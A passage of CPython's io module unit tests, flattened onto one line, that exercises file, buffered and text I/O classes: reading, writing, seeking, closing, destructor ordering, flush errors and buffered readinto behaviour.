self.assertRaises(exc, fp.read) self.assertRaises(exc, fp.readline) with self.open(support.TESTFN, "rb", buffering=0) as fp: self.assertRaises(exc, fp.write, b"blah") self.assertRaises(exc, fp.writelines, [b"blah\n"]) with self.open(support.TESTFN, "rb") as fp: self.assertRaises(exc, fp.write, b"blah") self.assertRaises(exc, fp.writelines, [b"blah\n"]) with self.open(support.TESTFN, "r") as fp: self.assertRaises(exc, fp.write, "blah") self.assertRaises(exc, fp.writelines, ["blah\n"]) # Non-zero seeking from current or end pos self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR) self.assertRaises(exc, fp.seek, -1, self.SEEK_END) def test_optional_abilities(self): # Test for OSError when optional APIs are not supported # The purpose of this test is to try fileno(), reading, writing and # seeking operations with various objects that indicate they do not # support these operations. def pipe_reader(): [r, w] = os.pipe() os.close(w) # So that read() is harmless return self.FileIO(r, "r") def pipe_writer(): [r, w] = os.pipe() self.addCleanup(os.close, r) # Guarantee that we can write into the pipe without blocking thread = threading.Thread(target=os.read, args=(r, 100)) thread.start() self.addCleanup(thread.join) return self.FileIO(w, "w") def buffered_reader(): return self.BufferedReader(self.MockUnseekableIO()) def buffered_writer(): return self.BufferedWriter(self.MockUnseekableIO()) def buffered_random(): return self.BufferedRandom(self.BytesIO()) def buffered_rw_pair(): return self.BufferedRWPair(self.MockUnseekableIO(), self.MockUnseekableIO()) def text_reader(): class UnseekableReader(self.MockUnseekableIO): writable = self.BufferedIOBase.writable write = self.BufferedIOBase.write return self.TextIOWrapper(UnseekableReader(), "ascii") def text_writer(): class UnseekableWriter(self.MockUnseekableIO): readable = self.BufferedIOBase.readable read = self.BufferedIOBase.read return self.TextIOWrapper(UnseekableWriter(), "ascii") tests = ( (pipe_reader, "fr"), (pipe_writer, "fw"), (buffered_reader, "r"), (buffered_writer, "w"), (buffered_random, "rws"), (buffered_rw_pair, "rw"), (text_reader, "r"), (text_writer, "w"), (self.BytesIO, "rws"), (self.StringIO, "rws"), ) for [test, abilities] in tests: with self.subTest(test), test() as obj: readable = "r" in abilities self.assertEqual(obj.readable(), readable) writable = "w" in abilities self.assertEqual(obj.writable(), writable) if isinstance(obj, self.TextIOBase): data = "3" elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)): data = b"3" else: self.fail("Unknown base class") if "f" in abilities: obj.fileno() else: self.assertRaises(OSError, obj.fileno) if readable: obj.read(1) obj.read() else: self.assertRaises(OSError, obj.read, 1) self.assertRaises(OSError, obj.read) if writable: obj.write(data) else: self.assertRaises(OSError, obj.write, data) if sys.platform.startswith("win") and test in ( pipe_reader, pipe_writer): # Pipes seem to appear as seekable on Windows continue seekable = "s" in abilities self.assertEqual(obj.seekable(), seekable) if seekable: obj.tell() obj.seek(0) else: self.assertRaises(OSError, obj.tell) self.assertRaises(OSError, obj.seek, 0) if writable and seekable: obj.truncate() obj.truncate(0) else: self.assertRaises(OSError, obj.truncate) self.assertRaises(OSError, obj.truncate, 0) def test_open_handles_NUL_chars(self): fn_with_NUL = 'foo\0bar' self.assertRaises(ValueError, self.open, fn_with_NUL, 'w') bytes_fn = bytes(fn_with_NUL, 'ascii') with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) self.assertRaises(ValueError, self.open, bytes_fn, 'w') def test_raw_file_io(self): with self.open(support.TESTFN, "wb", buffering=0) as f: self.assertEqual(f.readable(), False) self.assertEqual(f.writable(), True) self.assertEqual(f.seekable(), True) self.write_ops(f) with self.open(support.TESTFN, "rb", buffering=0) as f: self.assertEqual(f.readable(), True) self.assertEqual(f.writable(), False) self.assertEqual(f.seekable(), True) self.read_ops(f) def test_buffered_file_io(self): with self.open(support.TESTFN, "wb") as f: self.assertEqual(f.readable(), False) self.assertEqual(f.writable(), True) self.assertEqual(f.seekable(), True) self.write_ops(f) with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.readable(), True) self.assertEqual(f.writable(), False) self.assertEqual(f.seekable(), True) self.read_ops(f, True) def test_readline(self): with self.open(support.TESTFN, "wb") as f: f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line") with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.readline(), b"abc\n") self.assertEqual(f.readline(10), b"def\n") self.assertEqual(f.readline(2), b"xy") self.assertEqual(f.readline(4), b"zzy\n") self.assertEqual(f.readline(), b"foo\x00bar\n") self.assertEqual(f.readline(None), b"another line") self.assertRaises(TypeError, f.readline, 5.3) with self.open(support.TESTFN, "r") as f: self.assertRaises(TypeError, f.readline, 5.3) def test_readline_nonsizeable(self): # Issue #30061 # Crash when readline() returns an object without __len__ class R(self.IOBase): def readline(self): return None self.assertRaises((TypeError, StopIteration), next, R()) def test_next_nonsizeable(self): # Issue #30061 # Crash when __next__() returns an object without __len__ class R(self.IOBase): def __next__(self): return None self.assertRaises(TypeError, R().readlines, 1) def test_raw_bytes_io(self): f = self.BytesIO() self.write_ops(f) data = f.getvalue() self.assertEqual(data, b"hello world\n") f = self.BytesIO(data) self.read_ops(f, True) def test_large_file_ops(self): # On Windows and Mac OSX this test consumes large resources; It takes # a long time to build the >2 GiB file and takes >2 GiB of disk space # therefore the resource must be enabled to run this test. if sys.platform[:3] == 'win' or sys.platform == 'darwin': support.requires( 'largefile', 'test requires %s bytes and a long time to run' % self.LARGE) with self.open(support.TESTFN, "w+b", 0) as f: self.large_file_ops(f) with self.open(support.TESTFN, "w+b") as f: self.large_file_ops(f) def test_with_open(self): for bufsize in (0, 100): f = None with self.open(support.TESTFN, "wb", bufsize) as f: f.write(b"xxx") self.assertEqual(f.closed, True) f = None try: with self.open(support.TESTFN, "wb", bufsize) as f: 1/0 except ZeroDivisionError: self.assertEqual(f.closed, True) else: self.fail("1/0 didn't raise an exception") # issue 5008 def test_append_mode_tell(self): with self.open(support.TESTFN, "wb") as f: f.write(b"xxx") with self.open(support.TESTFN, "ab", buffering=0) as f: self.assertEqual(f.tell(), 3) with self.open(support.TESTFN, "ab") as f: self.assertEqual(f.tell(), 3) with self.open(support.TESTFN, "a") as f: self.assertGreater(f.tell(), 0) def test_destructor(self): record = [] class MyFileIO(self.FileIO): def __del__(self): record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() with support.check_warnings(('', ResourceWarning)): f = MyFileIO(support.TESTFN, "wb") f.write(b"xxx") del f support.gc_collect() self.assertEqual(record, [1, 2, 3]) with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"xxx") def _check_base_destructor(self, base): record = [] class MyIO(base): def __init__(self): # This exercises the availability of attributes on object # destruction. # (in the C version, close() is called by the tp_dealloc # function, not by __del__) self.on_del = 1 self.on_close = 2 self.on_flush = 3 def __del__(self): record.append(self.on_del) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(self.on_close) super().close() def flush(self): record.append(self.on_flush) super().flush() f = MyIO() del f support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_IOBase_destructor(self): self._check_base_destructor(self.IOBase) def test_RawIOBase_destructor(self): self._check_base_destructor(self.RawIOBase) def test_BufferedIOBase_destructor(self): self._check_base_destructor(self.BufferedIOBase) def test_TextIOBase_destructor(self): self._check_base_destructor(self.TextIOBase) def test_close_flushes(self): with self.open(support.TESTFN, "wb") as f: f.write(b"xxx") with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"xxx") def test_array_writes(self): a = array.array('i', range(10)) n = len(a.tobytes()) def check(f): with f: self.assertEqual(f.write(a), n) f.writelines((a,)) check(self.BytesIO()) check(self.FileIO(support.TESTFN, "w")) check(self.BufferedWriter(self.MockRawIO())) check(self.BufferedRandom(self.MockRawIO())) check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())) def test_closefd(self): self.assertRaises(ValueError, self.open, support.TESTFN, 'w', closefd=False) def test_read_closed(self): with self.open(support.TESTFN, "w") as f: f.write("egg\n") with self.open(support.TESTFN, "r") as f: file = self.open(f.fileno(), "r", closefd=False) self.assertEqual(file.read(), "egg\n") file.seek(0) file.close() self.assertRaises(ValueError, file.read) with self.open(support.TESTFN, "rb") as f: file = self.open(f.fileno(), "rb", closefd=False) self.assertEqual(file.read()[:3], b"egg") file.close() self.assertRaises(ValueError, file.readinto, bytearray(1)) def test_no_closefd_with_filename(self): # can't use closefd in combination with a file name self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False) def test_closefd_attr(self): with self.open(support.TESTFN, "wb") as f: f.write(b"egg\n") with self.open(support.TESTFN, "r") as f: self.assertEqual(f.buffer.raw.closefd, True) file = self.open(f.fileno(), "r", closefd=False) self.assertEqual(file.buffer.raw.closefd, False) def test_garbage_collection(self): # FileIO objects are collected, and collecting them flushes # all data to disk. with support.check_warnings(('', ResourceWarning)): f = self.FileIO(support.TESTFN, "wb") f.write(b"abcxxx") f.f = f wr = weakref.ref(f) del f support.gc_collect() self.assertIsNone(wr(), wr) with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"abcxxx") def test_unbounded_file(self): # Issue #1174606: reading from an unbounded stream such as /dev/zero. zero = "/dev/zero" if not os.path.exists(zero): self.skipTest("{0} does not exist".format(zero)) if sys.maxsize > 0x7FFFFFFF: self.skipTest("test can only run in a 32-bit address space") if support.real_max_memuse < support._2G: self.skipTest("test requires at least 2 GiB of memory") with self.open(zero, "rb", buffering=0) as f: self.assertRaises(OverflowError, f.read) with self.open(zero, "rb") as f: self.assertRaises(OverflowError, f.read) with self.open(zero, "r") as f: self.assertRaises(OverflowError, f.read) def check_flush_error_on_close(self, *args, **kwargs): # Test that the file is closed despite failed flush # and that flush() is called before file closed. f = self.open(*args, **kwargs) closed = [] def bad_flush(): closed[:] = [f.closed] raise OSError() f.flush = bad_flush self.assertRaises(OSError, f.close) # exception not swallowed self.assertTrue(f.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed f.flush = lambda: None # break reference loop def test_flush_error_on_close(self): # raw file # Issue #5700: io.FileIO calls flush() after file closed self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0) fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', buffering=0) fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False) os.close(fd) # buffered io self.check_flush_error_on_close(support.TESTFN, 'wb') fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb') fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', closefd=False) os.close(fd) # text io self.check_flush_error_on_close(support.TESTFN, 'w') fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'w') fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'w', closefd=False) os.close(fd) def test_multi_close(self): f = self.open(support.TESTFN, "wb", buffering=0) f.close() f.close() f.close() self.assertRaises(ValueError, f.flush) def test_RawIOBase_read(self): # Exercise the default limited RawIOBase.read(n) implementation (which # calls readinto() internally). rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None)) self.assertEqual(rawio.read(2), b"ab") self.assertEqual(rawio.read(2), b"c") self.assertEqual(rawio.read(2), b"d") self.assertEqual(rawio.read(2), None) self.assertEqual(rawio.read(2), b"ef") self.assertEqual(rawio.read(2), b"g") self.assertEqual(rawio.read(2), None) self.assertEqual(rawio.read(2), b"") def test_types_have_dict(self): test = ( self.IOBase(), self.RawIOBase(), self.TextIOBase(), self.StringIO(), self.BytesIO() ) for obj in test: self.assertTrue(hasattr(obj, "__dict__")) def test_opener(self): with self.open(support.TESTFN, "w") as f: f.write("egg\n") fd = os.open(support.TESTFN, os.O_RDONLY) def opener(path, flags): return fd with self.open("non-existent", "r", opener=opener) as f: self.assertEqual(f.read(), "egg\n") def test_bad_opener_negative_1(self): # Issue #27066. def badopener(fname, flags): return -1 with self.assertRaises(ValueError) as cm: open('non-existent', 'r', opener=badopener) self.assertEqual(str(cm.exception), 'opener returned -1') def test_bad_opener_other_negative(self): # Issue #27066. def badopener(fname, flags): return -2 with self.assertRaises(ValueError) as cm: open('non-existent', 'r', opener=badopener) self.assertEqual(str(cm.exception), 'opener returned -2') def test_fileio_closefd(self): # Issue #4841 with self.open(__file__, 'rb') as f1, \ self.open(__file__, 'rb') as f2: fileio = self.FileIO(f1.fileno(), closefd=False) # .__init__() must not close f1 fileio.__init__(f2.fileno(), closefd=False) f1.readline() # .close() must not close f2 fileio.close() f2.readline() def test_nonbuffered_textio(self): with support.check_no_resource_warning(self): with self.assertRaises(ValueError): self.open(support.TESTFN, 'w', buffering=0) def test_invalid_newline(self): with support.check_no_resource_warning(self): with self.assertRaises(ValueError): self.open(support.TESTFN, 'w', newline='invalid') def test_buffered_readinto_mixin(self): # Test the implementation provided by BufferedIOBase class Stream(self.BufferedIOBase): def read(self, size): return b"12345" read1 = read stream = Stream() for method in ("readinto", "readinto1"): with self.subTest(method): buffer = byteslike(5) self.assertEqual(getattr(stream, method)(buffer), 5) self.assertEqual(bytes(buffer), b"12345") def test_fspath_support(self): def check_path_succeeds(path): with self.open(path, "w") as f: f.write("egg\n") with self.open(path, "r") as f: self.assertEqual(f.read(), "egg\n") check_path_succeeds(FakePath(support.TESTFN)) check_path_succeeds(FakePath(support.TESTFN.encode('utf-8'))) with self.open(support.TESTFN, "w") as f: bad_path = FakePath(f.fileno()) with self.assertRaises(TypeError): self.open(bad_path, 'w') bad_path = FakePath(None) with self.assertRaises(TypeError): self.open(bad_path, 'w') bad_path = FakePath(FloatingPointError) with self.assertRaises(FloatingPointError): self.open(bad_path, 'w') # ensure that refcounting is correct with some error conditions with self.assertRaisesRegex(ValueError, 'read/write/append mode'): self.open(FakePath(support.TESTFN), 'rwxa') def test_RawIOBase_readall(self): # Exercise the default unlimited RawIOBase.read() and readall() # implementations. rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg")) self.assertEqual(rawio.read(), b"abcdefg") rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg")) self.assertEqual(rawio.readall(), b"abcdefg") def test_BufferedIOBase_readinto(self): # Exercise the default BufferedIOBase.readinto() and readinto1() # implementations (which call read() or read1() internally). class Reader(self.BufferedIOBase): def __init__(self, avail): self.avail = avail def read(self, size): result = self.avail[:size] self.avail = self.avail[size:] return result def read1(self, size): """Returns no more than 5 bytes at once""" return self.read(min(size, 5)) tests = ( # (test method, total data available, read buffer size, expected # read size) ("readinto", 10, 5, 5), ("readinto", 10, 6, 6), # More than read1() can return ("readinto", 5, 6, 5), # Buffer larger than total available ("readinto", 6, 7, 6), ("readinto", 10, 0, 0), # Empty buffer ("readinto1", 10, 5, 5), # Result limited to single read1() call ("readinto1", 10, 6, 5), # Buffer larger than read1() can return ("readinto1", 5, 6, 5), # Buffer larger than total available ("readinto1", 6, 7, 5), ("readinto1", 10, 0, 0), # Empty buffer ) UNUSED_BYTE = 0x81 for test in tests: with self.subTest(test): method, avail, request, result = test reader = Reader(bytes(range(avail))) buffer = bytearray((UNUSED_BYTE,) * request) method = getattr(reader, method) self.assertEqual(method(buffer), result) self.assertEqual(len(buffer), request) self.assertSequenceEqual(buffer[:result], range(result)) unused = (UNUSED_BYTE,) * (request - result) self.assertSequenceEqual(buffer[result:], unused) self.assertEqual(len(reader.avail), avail - result) def test_close_assert(self): class R(self.IOBase): def __setattr__(self, name, value): pass def flush(self): raise OSError() f = R() # This would cause an assertion failure. self.assertRaises(OSError, f.close) # Silence destructor error R.flush = lambda self: None class CIOTest(IOTest): def test_IOBase_finalize(self): # Issue #12149: segmentation fault on _PyIOBase_finalize when both a # class which inherits IOBase and an object of this class are caught # in a reference cycle and close() is already in the method cache. class MyIO(self.IOBase): def close(self): pass # create an instance to populate the method cache MyIO() obj = MyIO() obj.obj = obj wr = weakref.ref(obj) del MyIO del obj support.gc_collect() self.assertIsNone(wr(), wr) class PyIOTest(IOTest): pass @support.cpython_only class APIMismatchTest(unittest.TestCase): def test_RawIOBase_io_in_pyio_match(self): """Test that pyio RawIOBase class has all c RawIOBase methods""" mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase, ignore=('__weakref__',)) self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods') def test_RawIOBase_pyio_in_io_match(self): """Test that c RawIOBase class has all pyio RawIOBase methods""" mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase) self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods') class CommonBufferedTests: # Tests common to BufferedReader, BufferedWriter and BufferedRandom def test_detach(self): raw = self.MockRawIO() buf = self.tp(raw) self.assertIs(buf.detach(), raw) self.assertRaises(ValueError, buf.detach) repr(buf) # Should still work def test_fileno(self): rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertEqual(42, bufio.fileno()) def test_invalid_args(self): rawio = self.MockRawIO() bufio = self.tp(rawio) # Invalid whence self.assertRaises(ValueError, bufio.seek, 0, -1) self.assertRaises(ValueError, bufio.seek, 0, 9) def test_override_destructor(self): tp = self.tp record = [] class MyBufferedIO(tp): def __del__(self): record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() rawio = self.MockRawIO() bufio = MyBufferedIO(rawio) del bufio support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_context_manager(self): # Test usability as a context manager rawio = self.MockRawIO() bufio = self.tp(rawio) def _with(): with bufio: pass _with() # bufio should now be closed, and using it a second time should raise # a ValueError. self.assertRaises(ValueError, _with) def test_error_through_destructor(self): # Test that the exception state is not modified by a destructor, # even if close() fails. rawio = self.CloseFailureIO() with support.catch_unraisable_exception() as cm: with self.assertRaises(AttributeError): self.tp(rawio).xyzzy if not IOBASE_EMITS_UNRAISABLE: self.assertIsNone(cm.unraisable) elif cm.unraisable is not None: self.assertEqual(cm.unraisable.exc_type, OSError) def test_repr(self): raw = self.MockRawIO() b = self.tp(raw) clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__) self.assertRegex(repr(b), "<%s>" % clsname) raw.name = "dummy" self.assertRegex(repr(b), "<%s name='dummy'>" % clsname) raw.name = b"dummy" self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname) def test_recursive_repr(self): # Issue #25455 raw = self.MockRawIO() b = self.tp(raw) with support.swap_attr(raw, 'name', b): try: repr(b) # Should not crash except RuntimeError: pass def test_flush_error_on_close(self): # Test that buffered file is closed despite failed flush # and that flush() is called before file closed. raw = self.MockRawIO() closed = [] def bad_flush(): closed[:] = [b.closed, raw.closed] raise OSError() raw.flush = bad_flush b = self.tp(raw) self.assertRaises(OSError, b.close) # exception not swallowed self.assertTrue(b.closed) self.assertTrue(raw.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed self.assertFalse(closed[1]) raw.flush = lambda: None # break reference loop def test_close_error_on_close(self): raw = self.MockRawIO() def bad_flush(): raise OSError('flush') def bad_close(): raise OSError('close') raw.close = bad_close b = self.tp(raw) b.flush = bad_flush with self.assertRaises(OSError) as err: # exception not swallowed b.close() self.assertEqual(err.exception.args, ('close',)) self.assertIsInstance(err.exception.__context__, OSError) self.assertEqual(err.exception.__context__.args, ('flush',)) self.assertFalse(b.closed) # Silence destructor error raw.close = lambda: None b.flush = lambda: None def test_nonnormalized_close_error_on_close(self): # Issue #21677 raw = self.MockRawIO() def bad_flush(): raise non_existing_flush def bad_close(): raise non_existing_close raw.close = bad_close b = self.tp(raw) b.flush = bad_flush with self.assertRaises(NameError) as err: # exception not swallowed b.close() self.assertIn('non_existing_close', str(err.exception)) self.assertIsInstance(err.exception.__context__, NameError) self.assertIn('non_existing_flush', str(err.exception.__context__)) self.assertFalse(b.closed) # Silence destructor error b.flush = lambda: None raw.close = lambda: None def test_multi_close(self): raw = self.MockRawIO() b = self.tp(raw) b.close() b.close() b.close() self.assertRaises(ValueError, b.flush) def test_unseekable(self): bufio = self.tp(self.MockUnseekableIO(b"A" * 10)) self.assertRaises(self.UnsupportedOperation, bufio.tell) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) def test_readonly_attributes(self): raw = self.MockRawIO() buf = self.tp(raw) x = self.MockRawIO() with self.assertRaises(AttributeError): buf.raw = x class SizeofTest: @support.cpython_only def test_sizeof(self): bufsize1 = 4096 bufsize2 = 8192 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize1) size = sys.getsizeof(bufio) - bufsize1 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize2) self.assertEqual(sys.getsizeof(bufio), size + bufsize2) @support.cpython_only def test_buffer_freeing(self) : bufsize = 4096 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize) size = sys.getsizeof(bufio) - bufsize bufio.close() self.assertEqual(sys.getsizeof(bufio), size) class BufferedReaderTest(unittest.TestCase, CommonBufferedTests): read_mode = "rb" def test_constructor(self): rawio = self.MockRawIO([b"abc"]) bufio = self.tp(rawio) bufio.__init__(rawio) bufio.__init__(rawio, buffer_size=1024) bufio.__init__(rawio, buffer_size=16) self.assertEqual(b"abc", bufio.read()) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) rawio = self.MockRawIO([b"abc"]) bufio.__init__(rawio) self.assertEqual(b"abc", bufio.read()) def test_uninitialized(self): bufio = self.tp.__new__(self.tp) del bufio bufio = self.tp.__new__(self.tp) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', bufio.read, 0) bufio.__init__(self.MockRawIO()) self.assertEqual(bufio.read(0), b'') def test_read(self): for arg in (None, 7): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"abcdefg", bufio.read(arg)) # Invalid args self.assertRaises(ValueError, bufio.read, -2) def test_read1(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"a", bufio.read(1)) self.assertEqual(b"b", bufio.read1(1)) self.assertEqual(rawio._reads, 1) self.assertEqual(b"", bufio.read1(0)) self.assertEqual(b"c", bufio.read1(100)) self.assertEqual(rawio._reads, 1) self.assertEqual(b"d", bufio.read1(100)) self.assertEqual(rawio._reads, 2) self.assertEqual(b"efg", bufio.read1(100)) self.assertEqual(rawio._reads, 3) self.assertEqual(b"", bufio.read1(100)) self.assertEqual(rawio._reads, 4) def test_read1_arbitrary(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"a", bufio.read(1)) self.assertEqual(b"bc", bufio.read1()) self.assertEqual(b"d", bufio.read1()) self.assertEqual(b"efg", bufio.read1(-1)) self.assertEqual(rawio._reads, 3) self.assertEqual(b"", bufio.read1()) self.assertEqual(rawio._reads, 4) def test_readinto(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) b = bytearray(2) self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"ab") self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"cd") self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"ef") self.assertEqual(bufio.readinto(b), 1) self.assertEqual(b, b"gf") self.assertEqual(bufio.readinto(b), 0) self.assertEqual(b, b"gf") rawio = self.MockRawIO((b"abc", None)) bufio = self.tp(rawio) self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"ab") self.assertEqual(bufio.readinto(b), 1) self.assertEqual(b, b"cb") def test_readinto1(self): buffer_size = 10 rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl")) bufio = self.tp(rawio, buffer_size=buffer_size) b = bytearray(2) self.assertEqual(bufio.peek(3), b'abc') self.assertEqual(rawio._reads, 1) self.assertEqual(bufio.readinto1(b), 2) self.assertEqual(b, b"ab") self.assertEqual(rawio._reads, 1) self.assertEqual(bufio.readinto1(b), 1) self.assertEqual(b[:1], b"c") self.assertEqual(rawio._reads, 1) self.assertEqual(bufio.readinto1(b), 2) self.assertEqual(b, b"de") self.assertEqual(rawio._reads, 2) b = bytearray(2*buffer_size) self.assertEqual(bufio.peek(3), b'fgh') self.assertEqual(rawio._reads, 3) self.assertEqual(bufio.readinto1(b), 6) self.assertEqual(b[:6], b"fghjkl") self.assertEqual(rawio._reads, 4) def test_readinto_array(self): buffer_size = 60 data = b"a" * 26 rawio = self.MockRawIO((data,)) bufio = self.tp(rawio, buffer_size=buffer_size) # Create an array with element size > 1 byte b = array.array('i', b'x' * 32) assert len(b) != 16 # Read into it. We should get as many *bytes* as we can fit into b # (which is more than the number of elements) n = bufio.readinto(b) self.assertGreater(n, len(b)) # Check that old contents of b are preserved bm = memoryview(b).cast('B') self.assertLess(n, len(bm)) self.assertEqual(bm[:n], data[:n]) self.assertEqual(bm[n:], b'x' * (len(bm[n:]))) def test_readinto1_array(self): buffer_size = 60 data = b"a" * 26 rawio = self.MockRawIO((data,)) bufio = self.tp(rawio, buffer_size=buffer_size) # Create an array with element size > 1 byte b = array.array('i', b'x' * 32) assert len(b) != 16 # Read into it. We should get as many *bytes* as we can fit into b # (which is more than the number of elements) n = bufio.readinto1(b) self.assertGreater(n, len(b)) # Check that old contents of b are preserved bm = memoryview(b).cast('B') self.assertLess(n, len(bm)) self.assertEqual(bm[:n], data[:n]) self.assertEqual(bm[n:], b'x' * (len(bm[n:]))) def test_readlines(self): def bufio(): rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef")) return self.tp(rawio) self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"]) self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"]) self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"]) def test_buffering(self): data = b"abcdefghi" dlen = len(data) tests = [ [ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ], [ 100, [ 3, 3, 3], [ dlen ] ], [ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ], ] for bufsize, buf_read_sizes, raw_read_sizes in tests: rawio = self.MockFileIO(data) bufio = self.tp(rawio, buffer_size=bufsize) pos = 0 for nbytes in buf_read_sizes: self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes]) pos += nbytes # this is mildly implementation-dependent self.assertEqual(rawio.read_history, raw_read_sizes) def test_read_non_blocking(self): # Inject some None's in there to simulate EWOULDBLOCK rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None)) bufio = self.tp(rawio) self.assertEqual(b"abcd", bufio.read(6)) self.assertEqual(b"e", bufio.read(1)) self.assertEqual(b"fg", bufio.read()) self.assertEqual(b"", bufio.peek(1)) self.assertIsNone(bufio.read()) self.assertEqual(b"", bufio.read()) rawio = self.MockRawIO((b"a", None, None)) self.assertEqual(b"a", rawio.readall()) self.assertIsNone(rawio.readall()) def test_read_past_eof(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"abcdefg", bufio.read(9000)) def test_read_all(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"abcdefg", bufio.read()) @support.requires_resource('cpu') def test_threads(self): try: # Write out many bytes with exactly the same number of 0's, # 1's... 255's. This will help us check that concurrent reading # doesn't duplicate or forget contents. N = 1000 l = list(range(256)) * N random.shuffle(l) s = bytes(bytearray(l)) with self.open(support.TESTFN, "wb") as f: f.write(s) with self.open(support.TESTFN, self.read_mode, buffering=0) as raw: bufio = self.tp(raw, 8) errors = [] results = [] def f(): try: # Intra-buffer read then buffer-flushing read for n in cycle([1, 19]): s = bufio.read(n) if not s: break # list.append() is atomic results.append(s) except Exception as e: errors.append(e) raise threads = [threading.Thread(target=f) for x in range(20)] with threading_helper.start_threads(threads): time.sleep(0.02) # yield self.assertFalse(errors, "the following exceptions were caught: %r" % errors) s = b''.join(results) for i in range(256): c = bytes(bytearray([i])) self.assertEqual(s.count(c), N) finally: support.unlink(support.TESTFN) def test_unseekable(self): bufio = self.tp(self.MockUnseekableIO(b"A" * 10)) self.assertRaises(self.UnsupportedOperation, bufio.tell) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) bufio.read(1) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) self.assertRaises(self.UnsupportedOperation, bufio.tell) def test_misbehaved_io(self): rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertRaises(OSError, bufio.seek, 0) self.assertRaises(OSError, bufio.tell) # Silence destructor error bufio.close = lambda: None def test_no_extraneous_read(self): # Issue #9550; when the raw IO object has satisfied the read request, # we should not issue any additional reads, otherwise it may block # (e.g. socket). bufsize = 16 for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2): rawio = self.MockRawIO([b"x" * n]) bufio = self.tp(rawio, bufsize) self.assertEqual(bufio.read(n), b"x" * n) # Simple case: one raw read is enough to satisfy the request. self.assertEqual(rawio._extraneous_reads, 0, "failed for {}: {} != 0".format(n, rawio._extraneous_reads)) # A more complex case where two raw reads are needed to satisfy # the request. rawio = self.MockRawIO([b"x" * (n - 1), b"x"]) bufio = self.tp(rawio, bufsize) self.assertEqual(bufio.read(n), b"x" * n) self.assertEqual(rawio._extraneous_reads, 0, "failed for {}: {} != 0".format(n, rawio._extraneous_reads)) def test_read_on_closed(self): # Issue #23796 b = io.BufferedReader(io.BytesIO(b"12")) b.read(1) b.close() self.assertRaises(ValueError, b.peek) self.assertRaises(ValueError, b.read1, 1) def test_truncate_on_read_only(self): 